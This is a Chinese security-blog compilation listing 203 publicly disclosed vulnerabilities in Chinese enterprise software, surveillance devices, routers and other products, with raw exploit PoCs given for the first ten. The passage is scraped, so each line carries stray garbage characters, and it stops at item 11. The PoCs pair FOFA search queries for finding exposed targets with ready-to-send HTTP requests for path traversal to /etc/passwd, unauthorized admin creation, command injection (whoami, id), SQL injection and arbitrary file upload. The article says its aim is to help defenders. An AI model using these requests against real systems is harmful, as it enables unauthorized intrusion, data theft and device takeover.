互联网公开漏洞整理202309-2024065 U4 w# ]) y4 Z; b; K! c
道一安全 2024-06-05 07:41 北京
4 j- v8 X8 h" \% _# H6 s+ ^以下文章来源于网络安全新视界 ,作者网络安全新视界
1 @% R# ?. y) |8 {! Z
5 q- R! s8 C" Z1 Y. h发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。% U4 V6 \4 l4 S2 v" L
2 L( |; [% ?$ C6 n. d4 p% x) P# b漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
0 E5 e1 w& }1 c% \4 f
8 G' C3 N9 I3 V" Z$ k$ |3 H! ^安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。2 u1 _- j3 ?* k; q2 g6 i4 s
. _9 Z# A6 y/ Q6 T
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。8 H0 b3 H+ u+ _8 Y! Q% P! b! Q
$ M& [ l( z% a1 `2 k3 j
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。9 _, p1 L4 q) D9 A" R; h
; I! T6 ~! O6 e: r7 E/ u
* ]- ~& N! x1 R* z8 u声明
1 k" S1 N2 ^ a8 S/ C
# ~" ~) h9 w& w为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。: l& o# x/ s d1 h
( r. L7 w) \, |
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
" q7 B' S$ [. ?, T" N
, v" I* |$ }& d+ |
0 x7 f: c- o$ K7 V4 j( U" @( v6 y2 @% V R2 S: U
目录$ ~9 R7 n4 @8 z, Y9 x. F5 n
- `+ L$ P( ]3 b9 b/ w! |016 a' v; l- @) I* U
1 r' j' W) ?6 F+ F- t1. StarRocks MPP数据库未授权访问
2 u4 r4 [$ ?8 T7 U& f7 N2. Casdoor系统static任意文件读取0 L @9 {1 A7 T) ~
3. EasyCVR智能边缘网关 userlist 信息泄漏
9 L1 G9 \$ O+ H+ f* {* C e1 Q4. EasyCVR视频管理平台存在任意用户添加& }& I0 b+ |" _3 p- w( [' [! q
5. NUUO NVR 视频存储管理设备远程命令执行' b% O* S8 k# n% \ W
6. 深信服 NGAF 任意文件读取
, L! s* Z; J$ K/ y( X+ R* z9 f/ ]7. 鸿运主动安全监控云平台任意文件下载( r% s, `" l8 j& ?6 i3 f
8. 斐讯 Phicomm 路由器RCE
" W8 P6 C+ ?2 z# \! v( S9. 稻壳CMS keyword 未授权SQL注入
1 N# x9 g% Q) D/ f1 G10. 蓝凌EIS智慧协同平台api.aspx任意文件上传9 W6 H4 O" C. L6 l
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
' [: K* Q( \0 _7 G( \12. Jorani < 1.0.2 远程命令执行
. Z( x9 s" G% {13. 红帆iOffice ioFileDown任意文件读取0 H0 Y5 p) q+ Q, m7 k6 }3 s2 ]
14. 华夏ERP(jshERP)敏感信息泄露8 ^* o, e, m$ B7 e4 t: w) |
15. 华夏ERP getAllList信息泄露' }+ _3 c! e# ~% |
16. 红帆HFOffice医微云SQL注入: Q( d( I0 _ \
17. 大华 DSS itcBulletin SQL 注入
2 S2 o3 ` s: J* o! S/ G18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
4 z" M' y& e' M2 j19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入4 U, G) ~! E; R/ X
20. 大华ICC智能物联综合管理平台任意文件读取9 l$ l4 t9 {6 b" \% W3 K
21. 大华ICC智能物联综合管理平台random远程代码执行3 }+ r( p0 e& s4 U
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
: \1 z5 R9 h* B' m1 _9 N- h' o23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
' ]. G+ K4 w- t8 ~% p24. 用友NC 6.5 accept.jsp任意文件上传4 g7 I1 L( K7 \+ [
25. 用友NC registerServlet JNDI 远程代码执行- N9 e: V8 t1 _/ Q: \% K
26. 用友NC linkVoucher SQL注入
0 Q" @9 U" D0 K, q( K27. 用友 NC showcontent SQL注入. e0 R" G; ?9 O3 t a+ }8 v
28. 用友NC grouptemplet 任意文件上传8 g6 V+ [% Z. i( X
29. 用友NC down/bill SQL注入# D2 L$ Z) s3 X& z; V
30. 用友NC importPml SQL注入
9 Q8 D$ o4 ^3 V3 ~0 [0 D31. 用友NC runStateServlet SQL注入9 g: P( ]3 I/ R9 r3 k
32. 用友NC complainbilldetail SQL注入9 M5 I0 f3 r! j
33. 用友NC downTax/download SQL注入( I" C7 L- G V" l: ]; r: Z
34. 用友NC warningDetailInfo接口SQL注入' N5 W- u$ S$ K9 Z
35. 用友NC-Cloud importhttpscer任意文件上传
% z) R m; h: J' {* d/ a36. 用友NC-Cloud soapFormat XXE5 l' m! z8 L) j6 e
37. 用友NC-Cloud IUpdateService XXE2 u* p! D9 c2 C( U
38. 用友U8 Cloud smartweb2.RPC.d XXE
& k3 Q6 O4 ?- C. `2 t39. 用友U8 Cloud RegisterServlet SQL注入. A8 v9 ^7 q: ?
40. 用友U8-Cloud XChangeServlet XXE
+ \' V, S2 R: F7 o7 z41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
2 |$ |' S; U; ]# y A) X3 M9 D42. 用友GRP-U8 SmartUpload01 文件上传/ J. S% a- o) x) a( T6 g' R' k
43. 用友GRP-U8 userInfoWeb SQL注入致RCE4 _/ ?: ?7 K& H6 D, _ E# b& Z
44. 用友GRP-U8 bx_dj_check.jsp SQL注入, J& ^% b, w" C9 t$ K! W
45. 用友GRP-U8 ufgovbank XXE3 W: H- D7 V1 h
46. 用友GRP-U8 sqcxIndex.jsp SQL注入& u. i8 M. y. h3 r1 K6 \1 }5 _
47. 用友GRP A++Cloud 政府财务云 任意文件读取
, O7 P# X. a6 d48. 用友U8 CRM swfupload 任意文件上传
3 o6 r1 Q" J) T/ P# k! c: _9 _49. 用友U8 CRM系统uploadfile.php接口任意文件上传9 \; J# \/ s9 J R7 r5 X1 {
50. QDocs Smart School 6.4.1 filterRecords SQL注入 p/ B* a% ?0 Y4 h
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入; U7 A4 \. L* _: K- e% ^
52. 泛微E-Office json_common.php sql注入
/ y7 [3 ]' @/ {. _1 |0 R" j5 U4 ]9 M53. 迪普 DPTech VPN Service 任意文件上传
$ P9 n8 B* h4 _: x: t+ L54. 畅捷通T+ getstorewarehousebystore 远程代码执行
! Q+ b1 b9 q, g55. 畅捷通T+ getdecallusers信息泄露8 Z( A/ \- D: P- _$ n/ S
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE- H8 s1 u& c0 k% u0 s6 [% ~
57. 畅捷通T+ keyEdit.aspx SQL注入4 G/ S! X( }! t
58. 畅捷通T+ KeyInfoList.aspx sql注入# ?0 Y% [6 `( u6 T' m. o' ?& S4 _
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行4 _: W- G( G- E# S+ P
60. 百卓Smart管理平台 importexport.php SQL注入
" d- t: C; k+ n7 \0 K$ Y- r61. 浙大恩特客户资源管理系统 fileupload 任意文件上传8 ~1 ^. k! k) {1 v5 k: @
62. IP-guard WebServer 远程命令执行
$ F7 {; p5 d7 S; E$ X63. IP-guard WebServer任意文件读取( ~0 q4 G$ O3 y
64. 捷诚管理信息系统CWSFinanceCommon SQL注入 L6 T9 L$ K( ~7 a$ R& g0 X5 ]
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
- o$ _8 T- i* N. E. {66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
* R- b2 \( K R( v67. 万户ezOFFICE wpsservlet任意文件上传) a$ G- _9 Z* [1 F
68. 万户ezOFFICE wf_printnum.jsp SQL注入, R. q% P. @; h p0 G
69. 万户 ezOFFICE contract_gd.jsp SQL注入6 z V+ ~' s, ~0 q& c. K
70. 万户ezEIP success 命令执行, s4 R# J" j& T8 U3 i/ J& ^+ X
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
: x4 u0 u; V4 e8 f. d9 s+ Y) F72. 致远OA getAjaxDataServlet XXE
. C3 o+ K) n3 L73. GeoServer wms远程代码执行
- v; Q. j! Q9 ?- X74. 致远M3-server 6_1sp1 反序列化RCE" c% A. l9 k4 z% t, J
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
9 Q+ |5 \3 ~; L% W5 A5 [8 ?76. 新开普掌上校园服务管理平台service.action远程命令执行' _" {+ |# C8 D1 `; R: d
77. F22服装管理软件系统UploadHandler.ashx任意文件上传. I) `) J8 G9 M# D# L2 K4 l1 i
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传) [$ d5 [3 o: ]# E6 O2 q. `) O9 T
79. BYTEVALUE 百为流控路由器远程命令执行+ |$ P( P* z1 s
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传- c3 ]8 `* m+ `5 T
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露1 S; i* i% p/ G, J/ I: T) O$ z/ W
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
: ~+ _% D# Z' B" p2 l$ j83. JeecgBoot testConnection 远程命令执行
' U5 x. P2 M7 \84. Jeecg-Boot JimuReport queryFieldBySql 模板注入* H! N7 e' B: J L9 _7 Z+ u( F4 l$ e5 O
85. SysAid On-premise< 23.3.36远程代码执行7 H5 M& _, J& B9 y. b" k. `
86. 日本tosei自助洗衣机RCE! U9 r; Q2 ]0 z1 P8 E* a* u( S
87. 安恒明御安全网关aaa_local_web_preview文件上传& m- |3 n- x$ Y# B# X3 B& N
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行$ S6 x$ \0 _+ ?' n/ ?3 L
89. 致远互联FE协作办公平台editflow_manager存在sql注入1 j% E8 E0 p3 n9 f7 W0 i: P
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行3 G0 {& a! L5 {9 f
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
2 z: w# M# S7 j' G6 f1 B) ^1 w92. 海康威视运行管理中心session命令执行( Z3 N* I- r8 v) A9 Q' b* r
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
. |7 Y% L8 d" d94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传& R# \5 L; |4 T: S4 E
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
: g) t( b; x* x* U) p/ \) {96. Apache OFBiz 18.12.11 groovy 远程代码执行, [% w% A) I+ V( m
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行5 ]+ L- i6 H8 g
98. SpiderFlow爬虫平台远程命令执行
' b7 T- k$ y' E99. Ncast盈可视高清智能录播系统busiFacade RCE1 ?' A2 Z# e- ^4 p2 k
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
- D4 ]- V0 Q7 J! J: S8 [101. ivanti policy secure-22.6命令注入
, E6 P( u# M# K) S102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行1 y" ~6 b2 F0 u6 U; f
103. Ivanti Pulse Connect Secure VPN XXE
; _* c3 O, [) C2 l- C3 g104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露# c. D4 V* q' w7 J0 O* a
105. SpringBlade v3.2.0 export-user SQL 注入
3 s( k7 C* D2 h# w, ?. z106. SpringBlade dict-biz/list SQL 注入
9 Q, t( c0 ?& Z# w9 ^' {0 E- J, E107. SpringBlade tenant/list SQL 注入- c" a1 M) _, _
108. D-Tale 3.9.0 SSRF7 |/ S/ {* d1 \9 z
109. Jenkins CLI 任意文件读取
4 P) M A6 W, r110. Goanywhere MFT 未授权创建管理员% u+ R4 u+ H% E0 g5 ~9 [
111. WordPress Plugin HTML5 Video Player SQL注入
5 i6 R/ z+ u. S/ I6 m* q112. WordPress Plugin NotificationX SQL 注入
) {% o, N3 r" x' b' c113. WordPress Automatic 插件任意文件下载和SSRF
5 h, M( W' ]5 W+ u7 J: a. e! J# c114. WordPress MasterStudy LMS插件 SQL注入7 x7 W+ q$ y! V$ i- W
115. WordPress Bricks Builder <= 1.9.6 RCE/ n& m+ m( n. ~0 d5 H& a: Y0 Q
116. wordpress js-support-ticket文件上传
) I& v8 O5 M6 x3 k: N" ]) ]117. WordPress LayerSlider插件SQL注入
# ~4 b' H( A0 {2 w4 m7 i+ w118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
% B R* t" v6 U% |1 J119. 北京百绰智能S20后台sysmanageajax.php sql注入
8 o, f, `$ h: ]7 d- y: u120. 北京百绰智能S40管理平台导入web.php任意文件上传1 c* G* c0 _3 I. U# x
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
9 f/ |8 g# C l8 g+ `; F) @) z/ d122. 北京百绰智能s200管理平台/importexport.php sql注入
6 B5 f' w7 P* p& |123. Atlassian Confluence 模板注入代码执行4 D7 S/ [1 k- l0 J
124. 湖南建研工程质量检测系统任意文件上传
1 G4 R8 @0 C$ [$ h' i+ e125. ConnectWise ScreenConnect身份验证绕过( c/ I+ l0 R/ J- o
126. Aiohttp 路径遍历
$ F1 O0 ^8 {9 S( v" M" S4 e127. 广联达Linkworks DataExchange.ashx XXE
, D7 B0 Z1 K' w8 V* {5 S128. Adobe ColdFusion 反序列化
1 x+ W/ `5 E! f" n2 l) x4 Q129. Adobe ColdFusion 任意文件读取
- z2 A: H1 |0 P. x130. Laykefu客服系统任意文件上传
& g/ e5 y8 E- `! u3 F131. Mini-Tmall <=20231017 SQL注入( n+ [1 i7 L" j6 O1 @4 i1 K/ B
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过" t2 o2 `6 f" u. t6 P. V
133. H5 云商城 file.php 文件上传2 n8 l- B4 J5 e, ?
134. 网康NS-ASG应用安全网关index.php sql注入
1 F# D; j1 Z0 c8 c135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入/ ^$ y/ `* O( _% J
136. NextChat cors SSRF
6 L4 [" Q) M! v6 `* ^) p ?137. 福建科立迅通信指挥调度平台down_file.php sql注入2 @) Z2 X$ D- D- t1 n6 \
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入; K w7 ~; w' ^1 W5 n, U
139. 福建科立讯通信指挥调度平台editemedia.php sql注入0 f: S8 w/ v% e; ?% g5 o, e9 i6 o) j
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
! Z4 F$ h/ E: v7 q0 U141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入! M; q. d( v+ I; t7 M) R/ i: w
142. CMSV6车辆监控平台系统中存在弱密码% l7 @8 r1 h) [/ P `
143. Netis WF2780 v2.1.40144 远程命令执行
- I& V6 a9 y0 @144. D-Link nas_sharing.cgi 命令注入' m2 F. G! [. B
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入4 v( C' `) g- |( T9 l- Z0 |4 j
146. MajorDoMo thumb.php 未授权远程代码执行
+ J; S7 Y% a( b3 c7 M1 @5 l147. RaidenMAILD邮件服务器v.4.9.4-路径遍历' g& C( l3 v# n+ o5 m4 _5 G* Q, t# Y
148. CrushFTP 认证绕过模板注入
* Q% b8 R; S4 L- _: X/ k7 u% ]149. AJ-Report开源数据大屏存在远程命令执行 S, _5 S' q u w1 O
150. AJ-Report 1.4.0 认证绕过与远程代码执行# U" \+ v9 z' I+ Z+ A. @5 q8 B
151. AJ-Report 1.4.1 pageList sql注入+ ^+ k4 q8 }; b4 n6 d5 F1 y, R$ K
152. Progress Kemp LoadMaster 远程命令执行+ F5 H& F8 E; v: N6 Y2 h- Y& f- H
153. gradio任意文件读取
" Q8 e) q$ m4 |) y1 F- w0 Y. n154. 天维尔消防救援作战调度平台 SQL注入" H7 _( n% o: j( Q
155. 六零导航页 file.php 任意文件上传
+ M7 H/ z8 f1 y4 R9 V8 _* `1 V7 [156. TBK DVR-4104/DVR-4216 操作系统命令注入# J7 n0 ~2 i, i2 F$ J( o( S
157. 美特CRM upload.jsp 任意文件上传7 _. |; p0 o, X3 E% x, Q: U
158. Mura-CMS-processAsyncObject存在SQL注入2 L# I6 s8 D0 u2 d. f, V7 K1 g
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
0 W2 K& b- c% F8 m3 _$ s160. Sonatype Nexus Repository 3目录遍历与文件读取, K6 A0 P% ]/ G# K: {5 C2 A
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传: G7 ~+ F u$ J5 f$ c" O; V
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传2 U- @/ ^5 w/ ]
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
; s ~' R4 n4 i/ |; i. S3 M7 H% O164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传6 w c" j4 ^. r* Z g* k
165. OrangeHRM 3.3.3 SQL 注入1 [) }2 F- M9 J7 l: K- R6 S
166. 中成科信票务管理平台SeatMapHandler SQL注入
* V* S# M8 y l4 ^1 G& {8 @ a" g' ^167. 精益价值管理系统 DownLoad.aspx任意文件读取: \% z. ^, B# i; i9 u$ k" _
168. 宏景EHR OutputCode 任意文件读取* b: j4 Z8 Y: C
169. 宏景EHR downlawbase SQL注入
, k3 f6 p, Q/ [) G- k8 ~170. 宏景EHR DisplayExcelCustomReport 任意文件读取
# [3 Q/ |2 M5 @/ R( d171. 通天星CMSV6车载定位监控平台 SQL注入4 J% ?1 s9 K$ P. d1 g& K" @% v: D% h* r
172. DT-高清车牌识别摄像机任意文件读取 u" n z) @/ P* R
173. Check Point 安全网关任意文件读取
2 C9 M$ E- K; S174. 金和OA C6 FileDownLoad.aspx 任意文件读取5 x" C% D3 B7 t: x
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
u% e7 g6 Q: R I {* {176. 电信网关配置管理系统 rewrite.php 文件上传
4 @+ o" \; ?% c9 ~, Y7 b% Q177. H3C路由器敏感信息泄露
# K$ X' ]7 N8 T* F178. H3C校园网自助服务系统-flexfileupload-任意文件上传* G9 O; b! u6 A; B. Q' c+ j- g
179. 建文工程管理系统存在任意文件读取
/ a6 G0 m. V0 F180. 帮管客 CRM jiliyu SQL注入
* W, B5 h0 O' ~5 i" O3 c181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
: u$ H6 R6 t+ K2 s0 ]182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建1 h) |& S. h3 h; |# b
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
/ w0 I' I; ^$ n1 G184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
8 |$ V/ k: D8 H; ]4 q; @185. 瑞友天翼应用虚拟化系统SQL注入7 f% c, o% D$ o- [* r
186. F-logic DataCube3 SQL注入
9 h$ p9 F8 ~- |187. Mura CMS processAsyncObject SQL注入2 g1 e0 a! r( d6 A3 e# M) _+ b
188. 叁体-佳会视频会议 attachment 任意文件读取, z3 ]9 j9 A8 l& J4 g% L7 ~; Z
189. 蓝网科技临床浏览系统 deleteStudy SQL注入4 m9 _ A% s2 \& d
190. 短视频矩阵营销系统 poihuoqu 任意文件读取( |! P& y& \5 T$ J3 q
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
% B9 q, [4 Q( h: z9 b192. 富通天下外贸ERP UploadEmailAttr 任意文件上传7 D( w0 _0 W! | l( v* l
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
2 s; E% u0 y6 q; Q% c; e- U2 B2 J+ p194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
. C1 c8 n! S! V; J( t/ s! C195. 飞鱼星上网行为管理系统 send_order.cgi命令执行 p# ?6 S6 e7 ?! l8 ] t
196. 河南省风速科技统一认证平台密码重置$ E) b3 f' f# D% O" p/ v
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
4 l2 {8 S8 F& s+ z198. 阿里云盘 WebDAV 命令注入
( p$ m/ O! J) R6 ]. ]: z: q0 j4 x199. cockpit系统assetsmanager_upload接口 文件上传
" y o4 Q# [; {6 }* }% C200. SeaCMS海洋影视管理系统dmku SQL注入
9 u, O5 ^# r3 d5 P$ W' D! f. b& v201. 方正全媒体新闻采编系统 binary SQL注入( t* \) I/ d4 u. e
202. 微擎系统 AccountEdit任意文件上传
3 z3 y! r& V- B: ~203. 红海云EHR PtFjk 文件上传: d: [" m7 y% E, j
0 Q, c n4 y1 ~' L8 E1 Y2 ~& w. u
POC列表
2 X3 y1 |; ~9 T! d7 k5 L3 A; C* u2 l7 U
! H9 x: D9 I% _$ m4 H02
- G- Z b0 M) f, ]! V* S" b
, ]0 ?; U- }9 N: J' j: d1. StarRocks MPP数据库未授权访问 e) _+ I+ C# G5 W
FOFA :title="StarRocks"& H9 n. z5 B3 Y$ x; Z4 s& L4 d* }+ H
GET /mem_tracker HTTP/1.1
, M# _( ^) \* ]9 [, DHost: URL
% P+ L8 M9 u& q3 ?0 C) g4 Y) P7 g( [' t. Y: ^& [
+ f: V. o1 {7 E, E& L2. Casdoor系统static任意文件读取
Y# Z% t9 z* a bFOFA :title="Casdoor"
$ g" `& A9 d7 q$ zGET /static/../../../../../../../../../../../etc/passwd HTTP/1.11 G5 l: q' _7 g, g
Host: xx.xx.xx.xx:99999 `& _# C3 y) |! X$ ?' J+ ]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
9 Q' Y! _) a1 }Connection: close/ q6 {6 N8 [! o" T
Accept: */*3 k" l# X4 ~; z' V
Accept-Language: en
8 E3 @6 Q. {$ y) A0 ~8 PAccept-Encoding: gzip
/ |5 r: b2 I5 q+ B
2 E: e7 |+ x& S- p
/ ?4 d! a2 z; O: g# |% m3 ]6 h# ]3. EasyCVR智能边缘网关 userlist 信息泄漏
" |* D; I% L" J# cFOFA :title="EasyCVR"
2 B! d: B$ {# _3 r+ gGET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1; H' n+ V% E9 M s8 @0 e; y
Host: xx.xx.xx.xx
& }! t6 r3 C5 u
& N6 @; J# W' a7 {/ B2 J+ P8 \1 N+ D6 ^
4. EasyCVR视频管理平台存在任意用户添加
9 _5 P; }* h6 y: AFOFA :title="EasyCVR"& o' P! F z% q: {$ T' F
@4 d! l6 D. h" vpassword更改为自己的密码md5# f$ n3 p' p: G# O. M) V
POST /api/v1/adduser HTTP/1.1 ?) J6 D( S2 Q. m2 w8 n; f% k
Host: your-ip
1 ?8 g. Q+ H+ m0 u! Q% e, DContent-Type: application/x-www-form-urlencoded; charset=UTF-8- K! x& M+ K& R: o) n6 Z6 r: M
, A, K6 ^- r; A/ R4 ]* Aname=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
9 b: j( k$ v9 |
3 _. _3 ^& c L, x0 I
$ r2 d7 L5 O3 P! s5 g5. NUUO NVR 视频存储管理设备远程命令执行5 K4 `! h' q. `8 \ p6 {
FOFA:title="Network Video Recorder Login") s% _! X) g" N; U" w0 j
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
" k! L& ~$ `0 o) B5 k8 l8 `Host: xx.xx.xx.xx/ g' \3 q0 [) n, ]# C! |1 u
[) L$ Z% D, s& C% [, i0 G4 `
! W: ?: ~0 {5 K1 J# m! [
6. 深信服 NGAF 任意文件读取
( o: R8 I4 d5 ^+ L& H1 `FOFA:title="SANGFOR | NGAF"1 t3 E: {: D/ \2 v- I& ?
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1( K1 |& a" {& x# f" L
Host:
) f0 p' t. x- F8 g; ]' z
+ v$ H* i! V0 a4 r1 D- Y4 E1 p ]5 f: A# a- A- q& A; d
7. 鸿运主动安全监控云平台任意文件下载! o9 R9 @* _( Z, s( q1 I
FOFA:body="./open/webApi.html"" P! j+ H' g1 @% ^& ^$ |( J
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
- Z6 w0 c' `* O3 c' hHost:
0 P0 G" n' l: O) V9 \/ f/ |: b" s9 S) l5 H1 Y
% M* o- M1 c$ }8. 斐讯 Phicomm 路由器RCE
" U0 c6 Y4 U8 V7 rFOFA:icon_hash="-1344736688"
3 \* K( L; s$ w L. k默认账号admin登录后台后,执行操作2 c9 h, `% g& a; w( J
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.15 {, b- G+ H4 s! v" j7 E! J
Host: x.x.x.x
+ Q7 K# o* Q7 U) O8 C8 ECookie: sysauth=第一步登录获取的cookie1 m' E4 J% t" F# Y* n! p3 a% @7 w' i
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
6 q% `' C- i: b' f o! B, ]3 fUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.362 [/ b6 N4 ]( R: r6 ^
* [2 [) ]) Y1 e/ x" Q+ h' G------WebKitFormBoundaryxbgjoytz, C S: \( U2 C( A; a# W
Content-Disposition: form-data; name="wifiRebootEnablestatus"- @$ a' ?0 {# v! Q
! P. e8 w; E7 U- w& z# A7 z, ]
%s
* z) H2 e6 r" `* K0 C: c9 Z3 a------WebKitFormBoundaryxbgjoytz
1 D8 `* a3 @. A# d9 c& A7 S: y$ nContent-Disposition: form-data; name="wifiRebootrange"& y: F, z7 G# u# Q! z4 _" Z; `* T
7 G2 D$ P$ g# z3 b5 w12:00; id;3 u8 w. |2 }" F- S9 G( [
------WebKitFormBoundaryxbgjoytz
" l- @( M, k4 ^Content-Disposition: form-data; name="wifiRebootendrange"
% B& m1 e* o- ?: F! N5 E; a) t7 V9 c) z5 F [3 B) S8 q4 X: T* W
%s:
* ^; A4 c ^9 } t------WebKitFormBoundaryxbgjoytz
$ P, @- E& e0 u4 b2 ?9 Z8 BContent-Disposition: form-data; name="cururl2"
3 O6 z% r" p5 G Y" j* S1 F0 V
+ C2 J" ]* x0 A2 H6 x0 j0 ?3 r: P4 H+ y0 B
------WebKitFormBoundaryxbgjoytz--
0 ^) i5 H5 q* D4 t$ H9 o* t- q7 {. j& B
7 U! ~. V" f* k; ?; j! O9. 稻壳CMS keyword 未授权SQL注入
* T' D2 {: g( MFOFA:app="Doccms"# P4 H g' e6 d$ U; r7 N
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
) n( G/ K0 Y) ~* aHost: x.x.x.x, M2 m8 P) E8 S6 u# x, {
* n0 M; S' G, I/ _+ b
# ]8 `" m2 b/ Y8 ~ u: `2 bpayload为下列语句的二次Url编码
$ W* D9 A# h `2 I; E+ m- g; V& v* x3 o% e; `9 ]4 [
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#9 }( v- X# Q( N
8 d7 s* V1 v, q( p- o% Q# x
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传3 P' }6 d9 m4 M! {. R( a' i; e
FOFA:icon_hash="953405444"
5 h# l: I0 i; t, {- x& a2 {
5 W: G _2 ^9 @文件上传后响应中包含上传文件的路径
% {3 n. d/ ^; _. h* rPOST /eis/service/api.aspx?action=saveImg HTTP/1.18 G) p$ t1 h) H0 M3 N; q2 \1 @
Host: x.x.x.x:xx
" A5 k' x0 s5 d0 {3 A i, n! eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.362 d% g/ Q* `! g' h" d) D: C( L; p
Content-Length: 1978 f) m) ^) U- ?% A5 i; w$ t
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
# t1 o5 `0 n- y4 f: V7 H! X; M$ XAccept-Encoding: gzip, deflate: r, Y( a/ J" I+ Q* E
Accept-Language: zh-CN,zh;q=0.98 y7 m# l( c/ ?
Connection: close
' F2 d) U& }. F3 D9 e( x% TContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
6 U2 `; h! ~( @. i( L4 Z$ }* n" a# }2 j/ r8 Q
------WebKitFormBoundaryxdgaqmqu
) a/ `, A) V3 @5 m1 wContent-Disposition: form-data; name="file"filename="icfitnya.txt"
+ [+ L1 L/ u# `9 D7 sContent-Type: text/html& X- N& \6 h5 R( _ E/ L) E* \
c% r6 ^6 {" a+ h! g* ]jmnqjfdsupxgfidopeixbgsxbf+ D6 l( y1 d% G: e. H8 X- N3 y" M
------WebKitFormBoundaryxdgaqmqu--
; F6 d8 {$ @6 G, t$ V8 P1 o6 i( |* d$ g% n# ~* X. l% y
' H8 e6 t% L' w6 q& J% |% L
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
